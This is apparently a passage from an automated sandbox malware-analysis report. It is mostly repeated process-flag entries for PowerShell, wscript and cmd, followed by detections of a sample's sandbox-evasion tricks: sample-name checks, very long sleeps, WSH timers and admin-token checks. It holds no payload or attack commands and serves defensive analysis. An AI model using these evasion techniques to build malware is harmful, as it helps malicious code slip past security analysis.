Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

.NET source code contains a sample name check

Source: 4.2.powershell.exe.609a748.0.raw.unpack, SdUDpawKkufvFwUCPBjE.cs	.Net Code: Main contains sample name check
Source: 4.2.powershell.exe.5ffa728.1.raw.unpack, SdUDpawKkufvFwUCPBjE.cs	.Net Code: Main contains sample name check
Source: 4.2.powershell.exe.a6a0000.5.raw.unpack, SdUDpawKkufvFwUCPBjE.cs	.Net Code: Main contains sample name check
Source: 4.2.powershell.exe.5f826e8.2.raw.unpack, SdUDpawKkufvFwUCPBjE.cs	.Net Code: Main contains sample name check
Source: 11.2.powershell.exe.6fa73a0.0.raw.unpack, SdUDpawKkufvFwUCPBjE.cs	.Net Code: Main contains sample name check
Source: 11.2.powershell.exe.70473c0.2.raw.unpack, SdUDpawKkufvFwUCPBjE.cs	.Net Code: Main contains sample name check
Source: 11.2.powershell.exe.6f0f6e0.1.raw.unpack, SdUDpawKkufvFwUCPBjE.cs	.Net Code: Main contains sample name check
Source: 14.2.powershell.exe.64874c0.2.raw.unpack, SdUDpawKkufvFwUCPBjE.cs	.Net Code: Main contains sample name check
Source: 14.2.powershell.exe.634f7e0.0.raw.unpack, SdUDpawKkufvFwUCPBjE.cs	.Net Code: Main contains sample name check
Source: 14.2.powershell.exe.63e74a0.1.raw.unpack, SdUDpawKkufvFwUCPBjE.cs	.Net Code: Main contains sample name check

Contains long sleeps (>= 3 min)

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477

Found WSH timer for Javascript or VBS script (likely evasive script)

Source: C:\Windows\SysWOW64\wscript.exe	Window found: window name: WSH-Timer			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Window found: window name: WSH-Timer			Jump to behavior

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4706	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5071	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7489	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2171	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7521
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2048
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3659
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3368

Found evasive API chain checking for process token information

Source: C:\Users\user\Desktop\jcgLYlM4dg.exe

Check user administrative privileges: GetTokenInformation,DecisionNodes

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3172	Thread sleep count: 4706 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3172	Thread sleep count: 5071 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2892	Thread sleep time: -18446744073709540s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5252	Thread sleep time: -4611686018427385s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6256	Thread sleep count: 7521 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6252	Thread sleep count: 2048 > 30
